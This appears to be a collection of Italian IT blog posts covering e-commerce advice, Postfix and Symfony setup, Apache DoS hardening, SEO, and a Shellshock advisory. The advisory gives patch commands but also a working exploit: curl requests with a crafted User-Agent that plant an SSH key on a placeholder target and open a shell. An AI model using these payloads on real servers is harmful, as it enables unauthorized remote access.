1

Vuoi aprire o stai per aprire uno shop on line?

8 consigli utili per evitare gli errori che potrebbero costarti caro!

 

Il boom delle vendite on line non è finito con la pandemia, ma ha determinato il cambiamento di abitudini dei consumatori. Solo nel 2021 l’aumento registrato è stato del 68%!
Molte aziende possono incrementare le loro vendite con l’apertura di un e-commerce.
Vediamo però insieme quali sono le trappole e gli errori che si nascondono dietro la non corretta valutazione del progetto.

 

1) Il più comune: affidarsi a chi si improvvisa. Andare per tentativi, tramite il cugggino, o il vicino che è bravino col computer, vi costerà in termini di tempo e danno di immagine. Avere un e-commerce che non funziona o funziona male è il modo migliore per presentarsi come venditore inaffidabile. Selezionate professionisti con esperienza nel settore.

 

2) Creare un assortimento “minestrone della valle degli orti”. Alcune persone pensano di buttare dentro il proprio e-commerce diverse categorie senza un progetto reale. Si parte ad esempio dai prodotti per bambini, passando per la bigiotteria creata dalla sorella e la compagna di banco, per finire con avanzi di magazzino di un amico che vende elettrodomestici. Scegliete con cura il settore, i prodotti e l’identità che volete dare all’azienda.

 

3) Utilizzare foto e immagini di pessima qualità. E’ un errore che compromette l’aspetto del sito e quindi rende poco gradevole la navigazione e certamente allontana la vendita. Esistono molte risorse per i siti aziendali, gratuite o a pagamento. Faranno la differenza.  Valutate anche la possibilità di contattare un grafico e un  fotografo commerciale per i prodotti.

 

4) Avere schede prodotto prive di contenuti essenziali. Qualche esempio: omettere formule INCI dei cosmetici, le misure di elementi d’arredo, le certificazioni, ingredienti e allergeni dei prodotti alimentari.  Inutile dire che l’utente che non trova le informazioni, abbandona il carrello e acquista altrove. Scrivete tutto ciò che è essenziale per presentare e vendere il prodotto.

 

5) Nascondere contatti, elementi identificativi e dati obbligatori per legge. Mi è capitato di vedere diverse volte siti che non avevano partita iva in home page o con i contatti telefonici nascosti. Prestate la massima attenzione a tutti gli aspetti legali del sito e presentatevi con la massima trasparenza.

 

6) Pensare che si possa gestire nel tempo libero. Un e-commerce richiede tempo e tutte le risorse necessarie per funzionare bene. Un’assistenza clienti adeguata, una particolare attenzione alla logistica, un aspetto grafico curato, testi di descrizione e contenuti, conoscenza, adeguamento e rispetto della normativa, marketing….Investite in formazione e affidatevi a professionisti.

 


7) Fermarsi e sedersi una volta terminato. Alcune persone sono convinte che terminata la realizzazione del sito, inseriti grafica, testi e prodotti, ci si possa fermare e attendere le vendite.   E’ l’errore di valutazione più comune che vanifica tutto il lavoro svolto. Un shop on line non va avanti da solo. E’ bene esserne consapevoli fin dall’inizio.

 

8) Alla bersagliera. Spesso si parte con l’idea del “più ce n’è meglio è”. Allora tutto dentro: blog, profili Instagram, Facebook, Twitter, Pinterest, poi Whatsapp, TelegramSe poi manca la competenza e/o il tempo per la creazione dei contenuti, è certo il risultato finale. Scegli i social e i canali di comunicazione più adatti al tuo brand e al tuo target. Se non hai le competenze contatta un social media manager.




Shellshock vulnerability BASH

BASH CVE-2014-6271 vulnerability

Vulnerabilità grave della bash, la command line più diffusa dei sistemi Linux, associata all’utilizzo delle CGI consente di prendere il controllo del server.

Secondo Robert Graham, esperto di sicurezza di Errata Security, la falla che interessa Bash è probabilmente molto più grande e rischiosa di Heartbleed, l’enorme falla di Internet legata al sistema OpenSSL emersa lo scorso aprile.

I sistemi impattati sono principalmente le distribuzioni basate su RHEL, Debian, ma tutte quelle che usano la bash sono a rischio vulnerabilità.
http://youtu.be/ArEOVHQu9nk
La risoluzione è molto semplice, per le RHEL based, quindi RHEL stessa, Fedora, CentOS basta eseguire l’upgrade della bash:

yum upgrade bash

 

Mentre per le Debian based:

apt-get update; apt-get install bash

 

Per Debian 6 potrebbe essere necessario cambiare il repository nel file source.list, è possibile scaricare uno script che esegue la verifica della vulnerabilità sulla bash e poi esegue l’upgrade, scarica il file ZIP da estrarre sul sistema “shellshock.zip“, estrai il pacchetto, dai i permessi di esecuzione e lancialo:

 

wget http://www.lbit-solution.it/wp-content/plugins/download-monitor/download.php?id=13
unzip shellshock.zip
chmod +zx shellshock.sh
./shellshock.sh

Lo script scrive nella direcotory /root/  il file shellshock.txt, al suo interno sono presenti le informazioni della bash e la presenza della vulnerabilità prima e dopo l’upgrade.

 

Per testare se la versione della BASH è afflitta dalla vulnerabilità CVE-2014-6271  basta lanciare questo comando:

env x='() { :;}; echo vulnerabile' bash -c "echo prova"

Se riceviamo a video la parola “vulnerabile” e poi “prova” vuol dire che dobbiamo eseguire l’upgrade, nel caso ci fosse solo “prova” oppure “bash: warning: x: ignoring function definition attempt” vuol dire che la BASH in uso non è vulnerabile.

 

Perché avere paura del shellshock e chi deve correre ai ripari:

La vulnerabilità descritta in questo articolo consente di prendere il pieno controllo del server bersaglio solo se tale server ha in uso le CGI, questo perché è possibile inserire il settaggio si “X” con le istruzioni di nostro interesse nell’environment del server sfruttando l’HTTP_AGENT.

curl -k -H 'User-Agent: () { :;}; /bin/mkdir /var/www/.ssh' http://BERSAGLIO/cgi-bin/script.py
curl -k -H 'User-Agent: () { :;}; echo "ssh-rsa AAAAB3wAAAQEA[...]JXIQ== www-data@testserv" \
>/var/www/.ssh/authorized_keys' http://BERSAGLIO/cgi-bin/script.py
ssh www-data@BERSAGLIO
www-data@BERSAGLIO:~$ uname -a
Linux BERSAGLIO 2.6.32-431.11.2.el6.x86_64 #1 SMP Tue Mar 25 19:59:55 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

Cosa abbiamo fatto: avevamo precedentemente individuato sul server BERSAGLIO la presenza delle CGI e dello script script.py, conil curl gil abbiamo inviato una richiesta falsando il nostro “User-Agent”, nel suo interno sfruttiamo la vulnerabilità inserendo la creazione di una direcotry :

User-Agent: () { :;}; /bin/mkdir /var/www/.ssh

gli passiamo la nostra chiave per poter effettuare accesso in SSH

User-Agent: () { :;}; echo "ssh-rsa AAAAB3wAAAQEA[...]JXIQ== www-data@testserv"\ >/var/www/.ssh/authorized_keys

ora abbiamo completo accesso al terminale.

Questa vulnerabilità deve spaventare chi espone su internet un web server, tutti gli altri sistemi che erogano un servizio diverso hanno meno probabilità di essere bucati, ma comunque è sempre meglio fare l’upgrade della bash.

Per i sistemi Debian e Debian based non supportati, come la 5 c’è questo script pubblicato su “https://dmsimard.com/2014/09/25/the-bash-cve-2014-6271-shellshock-vulnerability/


#!/bin/bash
# dependencies
apt-get update; apt-get install build-essential gettext bison

# get bash 3.2 source
wget http://ftp.gnu.org/gnu/bash/bash-3.2.tar.gz
tar zxvf bash-3.2.tar.gz
cd bash-3.2

# download and apply all patches, including the latest one that patches CVE-2014-6271
# Note: CVE-2014-6271 is patched by release 52.
# Release 53 is not out on the GNU mirror yet - it should address CVE-2014-7169.
for i in $(seq -f "%03g" 1 52); do
    wget -nv http://ftp.gnu.org/gnu/bash/bash-3.2-patches/bash32-$i
    patch -p0 < bash32-$i
done

# compile and install to /usr/local/bin/bash
./configure && make
make install

# point /bin/bash to the new binary
mv /bin/bash /bin/bash.old
ln -s /usr/local/bin/bash /bin/bash



Postfix Forward Email To Multiple Email Account

Inoltrare le email a più indirizzi di posta elettronica.

Dobbiamo abilitare i virtual domain nella configurazione di Postfix, editiamo il file main.cf

 

# vi /etc/postfix/main.cf

Andiamo ad inserire il nome a dominio per il quale vogliamo creare i virtual alias o i nomi a dominio se sono più siti e il path con gli alias.

 

virtual_alias_domains = 3load.com 
virtual_alias_maps = hash:/etc/postfix/virtual
# virtual_alias_domains = 3load.com lbit-solution.it ...

 

Apriamo il file virtual

 

# vi /etc/postfix/virtual

 

Ora possiamo configurare ogni singola casella oppure ogni dominio, nel primo esempio inoltriamo tutte le mail di info a una casella gmail mentre le mail di supporto a più caselle di posta

 

info@3load.com   3load@gmail.com
supporto@3load.com   mailexample1@gmail.com  mailexample2@libero.it

 

Aggiungiamo anche la redirezione dell’intero dominio lbit-solution.it

 

info@3load.com   3load@gmail.com
supporto@3load.com   mailexample1@gmail.com  mailexample2@libero.it
@lbit-solution.it  mailexample@dominio.it

 

Salviamo il file ed eseguiamo il reload di postfix

 

# postmap /etc/postfix/virtual
# service postfix reload



Symfony – 01 – Installazione e configurazione del framework

Credo sia utile una mini guida su come installare e utilizzare il framework php Symfony2.

Innanzitutto preparatevi un ambiente LAMP, Linux + Apache + Mysql + Php

E prepariamoci un nuovo database mysql, che chiamiamo symfony , che dovremmo utilizzare per abilitare l’accesso securizzato.

Spostiamoci sotto la DocumentRoot di apache (se avete l’installazione di default, è /var/www/html )

Da qui, scarichiamo il composer, che serve per gestire le dipendenze del framework

curl -s https://getcomposer.org/installer | php

Ed ora scarichiamo il framework (ci vorrà qualche minuto).
Ho scelto la versione 2.3 che è supportata fino a Maggio 2016.

php composer.phar create-project symfony/framework-standard-edition symfony/ "2.3.*"

Ora vi chiede le informazioni sul database creato per configurare il file “##DOCUMENT_ROOT##/symfony/app/config/parameters.yml” (che potete configurare in un secondo momento).
Ve le riassumo qui:
database_driver (pdo_mysql):
database_host (127.0.0.1):
database_port (null):
database_name (symfony): symfony
database_user (root): myuser
database_password (null): mypassword
mailer_transport (smtp):
mailer_host (127.0.0.1):
mailer_user (null):
mailer_password (null):
locale (en): it
secret (ThisTokenIsNotSoSecretChangeIt): 2Cdq235nau

Il token potete generare una qualsiasi stringa.

Settiamo i permessi ai file scaricati:

chown -R apache.apache symfony
chmod -R 775 symfony

Ultimiamo l’installazione con:

cd symfony
mv ../composer.phar .
php composer.phar update
chmod 777 app/cache/ app/logs/

Listiamo i file installati:

ls -l

E avremo in seguente output:
totale 116
drwxrwxr-x 6 apache apache 4096 29 ago 11:44 app -> contiene log, cache, configurazioni, risorse
drwxrwxr-x 2 apache apache 4096 29 ago 11:38 bin -> binari del framework
-rwxrwxr-x 1 apache apache 2085 8 lug 16:17 composer.json
-rwxrwxr-x 1 apache apache 56987 29 ago 11:38 composer.lock
-rwxrwxr-x 1 apache apache 1065 8 lug 16:17 LICENSE
-rwxrwxr-x 1 apache apache 5736 8 lug 16:17 README.md
drwxrwxr-x 3 apache apache 4096 8 lug 16:17 src -> file sorgenti del progetto
-rwxrwxr-x 1 apache apache 1308 8 lug 16:17 UPGRADE-2.2.md
-rwxrwxr-x 1 apache apache 1962 8 lug 16:17 UPGRADE-2.3.md
-rwxrwxr-x 1 apache apache 8499 8 lug 16:17 UPGRADE.md
drwxrwxr-x 13 apache apache 4096 29 ago 11:44 vendor -> framework
drwxrwxr-x 3 apache apache 4096 29 ago 11:44 web -> documentRoot del framework

Ora se apriamo la seguente URL, modifichando ##MYHOST## con il nome del server, localhost se siamo in locale:

http://##MYHOST##/symfony/web/config.php

Si aprirà una pagina di verifica della configurazione, se non avete errori segnalati potete cliccare su
“Bypass configuration and go to the Welcome page”

Benvenuti nel vostro nuovo framework!

Se come errori segnalati, riscontrate il seguente:

    Set the “date.timezone” setting in php.ini* (like Europe/Paris).

Aggiungete la stringa
date.timezone = Europe/Berlin
nel file php.ini (di default sotto /etc) e restartare apache.

Nel prossimo post vedremo come configurare l’accesso securizzato.




DoS Apache – IDS e Firewall HTTP

DoS Apache – Prevenire attacchi Denial of Service e Distribuited Denial of Service con mod_evasive e mod_security

 

MOD EVASIVE

 

Proteggere il nostro webserver senza ricorrere a sistemi IDS particolarmente complessi o costosi è possibile, mod_evasive e mod_security sono i due moduli da installare e configurare per prevenire attacchi per Denial of Service (Dos) e Distribuited Denial of Service (DDoS), il primo lavora come un IDS, mentre il secondo usa delle regole similari ad un firewall.

Iniziamo impostando i valori di TimeOut e KeepAlive:

  • La direttiva RequestReadTimeout consente di limitare il tempo di un client per effettuare una  richiesta .
  • Il valore della direttiva TimeOut dovrebbe essere abbassato su siti che sono oggetto di attacchi DoS , è opportuno impostare questo a partire da un paio di secondi . Un valore troppo basso porterà problemi con  l’esecuzione di script CGI che richiedo molto tempo per il loro completamento.
  • Il parametro per la direttiva KeepAliveTimeout può essere abbassato anche su siti che sono oggetto di attacchi DoS . Disattivare il KeepAlive con impostazione Off, così come accade per alcuni siti, produce inconvenienti prestazionali, se impostata su On, permette di usare, come da specifiche HTTP/1.1, la stessa connessione TCP per inviare più file, è pertanto consigliata questa configurazione, che evita  l’apertura di una connessione TCP per ogni richiesta HTTP.

Il mod_evasive  intercetta  e  blocca un determinato indirizzo IP che svolge un determinato numero di richieste in un breve lasso di tempo.

Prima di procedere installiamo alcuni pacchetti fondamentali

# yum install make autoconf
# yum install gcc httpd-devel pcre-devel
# yum install libxml2 libxml2-devel curl curl-devel

Passiamo all’installazione,può essere fatta tramite yum:

# yum install -y mod_evasive

oppure scaricando il pacchetto e compilandolo:

# cd /usr/src
# wget http://www.zdziarski.com/blog/wpcontent/uploads/2010/02/mod_evasive_1.10.1.tar.gz
# tar xzf mod_evasive_1.10.1.tar.gz
# cd mod_evasive
# apxs -cia mod_evasive20.c

Passiamo ora alla configurazione:

# vi /etc/httpd/conf/httpd.conf

Abilitiamo il modulo e inseriamo le direttive:

LoadModule evasive20_module   /usr/lib64/httpd/modules/mod_evasive20.so

Editiamo il file

# vim /etc/httpd/conf.d/mod_evasive.conf

Inseriamo le entry di base:

# mod_evasive configuration
LoadModule evasive20_module modules/mod_evasive20.so
<IfModule mod_evasive20.c>
    DOSHashTableSize    3097
    DOSPageCount        2
    DOSSiteCount        50
    DOSPageInterval     1
    DOSSiteInterval     1
    DOSBlockingPeriod   10
    DOSEmailNotify      dos@lbit-solution.it
    #DOSSystemCommand    "su - someuser -c '/sbin/... %s ...'"
    DOSLogDir           "/var/log/httpd/mod_evasive"
    DOSWhitelist  95.110.245.202
    #DOSWhitelist   192.168.0.*
</IfModule>

 

Ora vediamo nel dettaglio le direttive:

  • DOSHashTableSize: dimensione della tabella di hash per la collezione dei dati di campionamento.
  • DOSPageCount: identifica la soglia di richiesta di una stessa pagina da parte di un host in un certo intervallo di tempo.
  • DOSSiteCount: identifica la soglia di richiesta di un qualsiasi oggetto da parte di un host in un certo intervallo di tempo.
  • DOSPageInterval: intevallo di tempo per la soglia del parametro DOSPageCount in secondi.
  • DOSSiteInterval: intevallo di tempo per la soglia del parametro DOSSiteCount in secondi.
  • DOSBlockingPeriod: parametro che specifica l’intervallo di tempo utilizzato per mostare l’http error 403 ai client che stanno eseguendo un probabile attacco DoS.
  • DOSEmailNotify: parametro che specifica l’indirizzo mail al quale inviare una mail di notifica, se un certo indirizzo IP sta eseguendo un probabile attacco Dos.
  • DOSWhitelist: con questo parametro è possibile aggiungere una lista di IP che non devono essere bloccati dal modulo, nella configurazione di esempio abbiamo applicato la regola per l’indirizzo IP 95.110.245.202
  • DOSLogDir: specifica un path alternativo alla temp directory per la collezione dei dati.
  • DOSSystemCommand: lancia uno specifico comando quando viene superata la soglia da parte di un client. Per ricavare l’indirizzo IP che ha sfortato la soglia si deve usare la variabile “%s”.

Per testare che tutto sia funzionante, e che le nostre richieste vengano bloccate possiamo usare uno script PERL:

#!/usr/bin/perl
# test.pl: small script to test mod_dosevasive's effectiveness
  use IO::Socket;
  use strict;
  for(0..100) {
      my($response);
      my($SOCKET) = new IO::Socket::INET( Proto   => "tcp",
                                        PeerAddr=> "127.0.0.1:80");
      if (! defined $SOCKET) { die $!; }
      print $SOCKET "GET /?$_ HTTP/1.0\n\n";
      $response = <$SOCKET>;
      print $response;
      close($SOCKET);
  }

Il risultato del test sarà il seguente:

HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden

 

MOD SECURITY

 

Anche per il mod_security vale la stessa regola del mod_evasive per l’installazione, possiamo scegliere se installarlo tramite repository oppure compilarlo.

Installazione tramite yum:

# yum install mod_security

Oppure scaricare il pacchetto ed installarlo:

# cd /usr/src
# wget http://www.modsecurity.org/download/modsecurity-apache_2.6.6.tar.gz
# tar xzf modsecurity-apache_2.6.6.tar.gz
# cd modsecurity-apache_2.6.6
# ./configure
# make install
# cp modsecurity.conf-recommended /etc/httpd/conf.d/modsecurity.conf

 

File di configurazione di mod_security

  1. /etc/httpd/conf.d/mod_security.conf – file di configurazione principale del modulo mod_security di Apache
  2. /etc/httpd/modsecurity.d/ – tutti gli altri file di configurazione modulo Apache mod_security.
  3. /etc/httpd/modsecurity.d/modsecurity_crs_10_config.conf – La configurazione presente in questo file deve essere personalizzata in base alle vostre esigenze prima di essere messa in esercizio.
  4. /var/log/httpd/modsec_debug.log – Usa i messaggi di debug per il debugging e altri problemi
  5. /var/log/httpd/modsec_audit.log – Tutte le richieste che attivano ModSecuirty (come rilevato) o gli errori server (“RelevantOnly”) vengono scritti nel file di log.

 

Editiamo il file  /etc/httpd/modsecurity.d/modsecurity_crs_10_config.conf

# vi  /etc/httpd/modsecurity.d/modsecurity_crs_10_config.conf

E attiviamo la protezione del webserver

# SecRuleEngine On

Riavviamo il servizio httpd

# service httpd restart

Vediamo dal file di log se non si sono problemi:


# tail -f /var/log/httpd/error_log

Abbiamo terminato l’installazine dei due moduli che ridurranno gli attacchi, ora in base all’hardware e alle proprie esigenze andranno configurati tutti i servizi.

 

Scarica il PDF Proteggere Apache da attacchi DoS e DDoS.




Realizzare il tuo sito Ecommerce SEO friendly

E’ il momento di fare qualcosa di eccezionale con il proprio sito di commercio elettronico, sopratutto per chi punta ad essere il primo della lista nei motori di ricerca.

Un business di successo con il commercio elettronico in questo mercato competitivo non è così facile come sembra, i proprietari hanno bisogno di trascorrere il loro tempo prezioso per la ricerca di soluzioni perfette, le quali fanno del loro sito di e-commerce un sito di successo. Diventa fondamentale rendere il sito il più possibile SEO friendly in modo che possa sempre stare un passo avanti sul web.

Tuttavia i gestori dei siti di commercio elettronico avranno trovato delle soluzioni adatte alle loro esigenze, tentenado di rendere quanto più possibile il loro e-commerce seo friendly. Non importa se si gestise un piccolo negozio on-line o un centro commerciale completo, è necessario considerare le caratteristiche SEO friendly che ho elencato qui di seguito.

 

Nome a dominio del marchio trattato.

Quando è il momento di scegliere un nome di dominio per il vostro sito, si consiglia di scegliere un nome di dominio del marchio in modo che i clienti possono facilmente trovarlo sul web. Molti propongono di selezionare i domini basati su parole chiave, che non sono efficaci quanto si pensi. Hanno bisogno di selezionare un nome di dominio di marca, perché la loro decisione incide sulla loro posizionamento sui motori di ricerca. Chi ha usato domini basati su parole chiavi ha ottenuto rapidamente il posizionamento nei motori di ricerca, ma dopo gli aggiornamenti di Google EMD, questo è stato reso inutile.

deleks.com
Nella foto sopra, potete vedere il nome di dominio del marchio: deleks.com. Questo è più efficace di bpsedie-shop.it (vedere nell’immagine qui sotto).

bpsedie-shop

 

Domain Hosting
L’hosting è un punto essenziale quando si tratta di sviluppare un sito e-commerce SEO friendly , come è necessario fare in modo che il tuo dominio non scada in periodo di tempo troppo breve. Tali tipi di domini non sono considerati molto affidabili, bisogna quindi optare per un hosting con scadenza molto lontana nel tempo. Ottenere un estensione del dominio di mira è una grande idea; per esempio, se si desidera che il vostro sito web si ben visto nel nel Regno Unito, si dovrebbe utilizzare il TLD (Top Level Domain) co.uk , per la Spagna il .es e così via per le nazioni di particolare interesse

 

SEO-friendly URLs

E’ molto importate avere un sito web con le URL SEO, che possano contenere le keyword dei prodotti e dei Marchi trattati, questo faciliterà l’inidicizzazione renderà più semlice l’identificazione del prduttore.

MeridiArte

 

Nella foto sopra, potete vedere che MeridDiarte.com ha URL SEO-friendly, mentre nella foto qui sotto, Petique non le ha.

 

Petique.it

 

Redirect 301
Il redirect 301 consente di redirigere direttamente da una pagina ad un’altra, questo è efficace quando dobbiamo togliere dei contenuti, abilitiamo il redirect 301 dalla vecchia pagina verso la nuova, in modo da non perdere l’indicizzazione ottenuta.

 

Canonical.

Canonical si riferisce a quelle pagine web che possono essere facilmente caricati da più URL senza creare un errore di contenuto duplicato. E’ un problema comune, soprattutto quando più pagine hanno lo stesso contenuto, ma URL diversi. Questo è ciò che Google considera come contenuto duplicato.

Ecco alcuni esempi:

http://www.yourwebsite.com/

Home


http:/yourwebsite.com/
http://yourwebsite.com/index.html

Con l’aiuto del meta <link rel=”canonical” href=”http://www.italia-video.net/” />, si può facilmente dire che Google URL è l’URL principale del sito. Attraverso questo concetto, si possono evitare problemi di contenuti duplicati e ottenere link al tuo URL principale. E’ importante che il sito di e-commerce faccia uso di link canonical.

 

SiteMap.xml


<?xml-stylesheet type="text/xsl" href="http://www.lowcostarredamenti.com/nv/sitemap.xsl"?>
<urlset xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd" 
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" 
xmlns:image="http://www.google.com/schemas/sitemap-image/1.1" >
  <url>
    <loc>http://www.lowcostarredamenti.com/similpelle-argos</loc>
    <changefreq>weekly</changefreq>
    <priority>1.0</priority>
    <image>http://www.lowcostarredamenti.com/marrone-argos.jpg</image>
    <title>Set 2 Sgabelli in similpelle marrone ARGOS</title>
    <link>http://www.lowcostarredamenti.com/similpelle-marrone-argos</link>
    <pubDate>2013-06-17 16:28:24</pubDate>
  </url>
  <url>
    <loc>http://www.lowcostarredamenti.com/pino-naturale-donau.html</loc>
    <changefreq>weekly</changefreq>
    <priority>1.0</priority>
    <image>http://www.lowcostarredamenti.comv/Donau-80x80.jpg</image>
    <title>Angolo soggiorno o tinello in pino naturale DONAU</title>
    <link>http://www.lowcostarredamenti.com/naturale-donau.html</link>
    <pubDate>0000-00-00 00:00:00</pubDate>
  </url>
</urlset>

La sitemap, o mappa del sito, gioca un ruolo molto importante nel rendere il vostro e-commerce individuabili nel web . E’ l’elenco completo delle pagine del tuo sito. E’ uno dei modi più semplici per dare ai motori di ricerca informazioni sulle pagine presenti nel sito. Principalmente ci sono due tipi di sitemap: la sitemap.xml e la sitemap.html.

La sitemap in formato xml (eXtensible Markup Language) è per i motori di ricerca, mentre sitemap in formato html (HyperText Markup Language) è per gli utenti che cercano di informazioni sulla struttura del sito e delle sue pagine. Attraverso la sitemap.xml, si può contribuire ad aiutare Google, e altri motori di ricerca, a leggere, scansionare e indicizzare il tuo sito web con facilità, senza ostacoli.

Robots.txt

Attraverso il file robots.txt, si possono specificare gli URL e le directory che i crawler (anche detti robot i spider) le ignorino. Utilizzare questo tag per mantenere alcune informazioni importanti e sensibili, presenti in alcune pagine,  private. ​

# Disallow all crawlers access to certain pages.

User-agent: *
Disallow: /exec/obidos/account-access-login
Disallow: /exec/obidos/change-style
Disallow: /exec/obidos/flex-sign-in

User-Agent: Googlebot
Disallow: /rss/people/*/reviews
Disallow: /gp/pdp/rss/*/reviews
Disallow: /gp/cdp/member-reviews/
Disallow: /gp/aw/cr/

Assicurarsi di utilizzare questo tag per mantenere le informazioni personali dei vostri clienti privati​​.

W3c Validation.

Il validatore W3C (World Wide Web Consortium) si occupa appunto di validare il markup del sito, e di mostrare a video gli errori. Eliminando gli errori, sarà molto più semplice effettuare la scansiona del sito da parte dei motori di ricerca.

Google Webmaster Tools

Gli strumenti per webmaster di Google di aiutano a mantenere il sito in ottima salute, segnalando eventuali errori di scansione, malware, statistiche sull’indicizzazione e sulla sitempa, tutto questo è, come per tutti i prodotti di big G, gratuito.

Qui sotto un esempio, il sito in questione ha qualche cosa da rivedere, come dimostrato dai 773 Non trovato e dalla sitemap che indicizza solo la metà delle pagine o articoli, 7.851 di 13.615 inviate.

GoogleWebMasters

Site Speed

Velocità del sito indica quanto tempo occorre per poterlo visualizzar. E ‘molto importante che la velocità di caricamento sia ridotta al minimo, un visitatore medio non attende oltre i 5 secondi, se il sito impiega più tempo lo esclude da i siti da “riotrnare” e la probabilità che possa fare un acquisto si riducono drasticamente. Anche qui ci aiuta GOOGLE con Page Speed, un tool che analizza il vostri sito e segnala eventuali modifiche da apportare per renderlo pià veloce.

Le regole di base sono tre:

  • Utilizzo della compressione
  • Utilizzo della cache
  • Dimensioni delle immagini ridotte

La compressione deve essere supportata dal Web Server, ma fate attenzione ad usarla, verificate che, una volta abilitata, il sito sia visibile su tutti i browser di vostro interesse, questo perché alcuni browser, come I.E. 6 non la supportano. La cache possiamo gestirla tramite i file .htaccess, ecco un esempio:


# durata mensile
 <FilesMatch "\.(jpg|jpeg|gif|png|ico|swf|flv)$">
 Header set Cache-Control "max-age=2592000"
 </FilesMatch>

 # durata settimanale
 <FilesMatch "\.(js|css|pdf|txt)$">
 Header set Cache-Control "max-age=604800"
 </FilesMatch>

 # durata giornaliera
 <FilesMatch "\.(html|htm)$">
 Header set Cache-Control "max-age=43200"
 </FilesMatch>

 

Meta Tag (titolo e descrizione) attraenti e l’esempio da immagine …

I Meta tag sono una parte importante del tuo sito web che fornisce informazioni ai motori di ricerca. Attraverso questi Tag, i proprietari di e-commerce possono facilmente fornire informazioni complete ai propri clienti circa i loro prodotti. E’ molto importante inserire dei meta tag nella sezione <head> del proprio sito, questi devono essere “attraenti”.

 

GoogleSearchAcquisto

Nella foto sopra, potete vedere che ho cercato per “acquistare smartphone” e eprice.it ha un meta tag attraente. “Acquiesta il tuo cellulare smartphone” è nel titolo cattura l’attenzione dei potenziali clienti.

 

Heading Tag (H1, H2, H3 etc)

Gli heading tag sono molto importanti per il sito web come gli H tag usati in qeusto articolo per definirne la struttura. I motori di ricerca si “accorgono” dei titoli H1 e sottotitoli H2, l’utilizzo anche degli altri (H3, H4, H5, ecc…) migliora il rendimento dell’inidicizzazione.

Utilizzando su tutte le pagine almeno i TAG H1 e H2 miglioreremo il posizionamento nella SERP (Search Engine Results Page).

Image Alt Tag

Il TAG Alt aiuta i motori di ricerca a capire cosa contiene  l’immagine definita nel tag img, questo è fondamentale, perché  adifferenza del testo, le immagini non possono essere viste dai crawler, si limitano solo a leggere il sorgente (src).

 

Pagina Prodotti & Ottimizzazinoe dei contenuti.

Il contenuto svolge un ruolo molto significativo, i motori di ricerca stanno prendendo in considerazione la pertinenza del tuo sito e l’importanza, sulla base dei meta tag e del contenuto. Ci sono vari punti che avete bisogno di prendere in considerazione, al fine di ottimizzare i contenuti e le pagine in modo efficiente:

  • Prezzo: Per ottimizzare notevolmente ilsito di ecommerce assicurarsi di aver messo ben in evidenza il prezzo.
  • Contenuto: Per ottimizzare la pagina del prodotto, così come i contenuti di tutto il sito, fornire contenuti precisi e dettagliati sulla pagina del prodotto  (come dettagli, recensioni di prodotti e panoramica sul prodotto stesso).
  • Prodotti Correlati: Inserire una quantità minima di 4 prodotti consente al visitatore di venire a conoscenza di altri prodtti interessanti. La stretta correlazione con il prodotto visto fa si ché il cliente trascorra più tempo sul sito e aumenti la sua voglia di navigarlo.
  • Parole in Grassetto: Scrivere le parole in grassetto è come indicare ai motori di ricerca quali sono le parole più importanti di tutto il contenuto della pagina.
  • LSI: Latent Semantic Indexing aggiunge un passo importante per il processo di indicizzazione dei documenti. Oltre a registrare le parole chiave che contiene un documento, il metodo esamina la collezione del documento nel suo complesso, per vedere quali altri documenti contengono alcune di quelle stesse parole. LSI considera i documenti che hanno molte parole in comune di essere semanticamente vicini, e quelli con poche parole in comune di essere semanticamente distante. Questo semplice metodo correla sorprendentemente bene come un essere umano, guardando i contenuti, potrebbe classificare una raccolta di documenti. Anche se l’algoritmo LSI non capisce niente del significato delle parole, per i risultati che ottiene può sembrare sorprendentemente intelligente.

 

Struttura di Navigazione Search engine Friendly

Per rendere il vostro sito e-commerce SEO friendly, è importante che abbia una struttura di navigazione semplice e un motori di ricerca, in modo che i vostri clienti lo troveranno facile da navigare. La struttura di navigazione è una parte molto importante del processo di ottimizzazione sui motori di ricerca; se si dispone di una struttura di facile navigazione, i search engine troveranno semplice indicizzare tutte le pagine web. Tutti proprietari e gestori di siti di e-commerce dovrebbero dare molta importanza al logo, alla mappa del sito, evitare collegamenti ad immagini e altro ancora.

 

Schema.org Markup

Schema.org offre un set completo di schemi, come i tag HTML e molto altro ancora, che i webmaster possono utilizzare per formattare le loro pagine in modo che siano riconosciute dai più importanti e popolari search engine. I motori di ricerca come Google, Yahoo! e Bing  si affidano a questo schema al fine di migliorare la visualizzazione dei risultati di ricerca.

Come esempio:

G4PLAY

Attraverso schema.org,  i siti web sono in grado di fornire ai loro clienti informazioni come la valutazione, i prezzi, descrizione prodotto, autore marchio dettagli e più. Qui, in questa immagine qui sopra si può vedere la valutazione del videogioco. Questo aoiuta i clienti nella ricerca del prodotto, maggiori informazioni sono visibili nelle SERP, maggiori sono le possibilità che l’utente apra il link del vostro sito.

Bottoni Social Sharing

Per gli esercenti di e-commerce è molto importante avere pulsanti di condivisione sociale sul loro sito web, in modo che i loro clienti possano condividere il prodotto con i loro amici.
L’utilizzo di bottoni di social sharing da la possibilità di far “girare” in rete i prodotti presenti sul sito di commercio elettronico. Facebook e Twitter hanno preso piede in tutto il mondo e la condivisione e la condivisione da parte degli utenti aumenta la visibilità del sito, dando così maggior valore all’immagine dell’azienda.

share_button

Codice di Google Analytics

Per il monitoraggio del sito sito web Google Analytics è uno strumento indispensabile, è possibile ottenere informazioni complete sul numero dei visitatori, informazioni relative a visualizzazioni di pagina e altro ancora. La cosa migliore di questo strumento è che è completamente gratuito e funziona molto bene per le piccole e grandi aziende.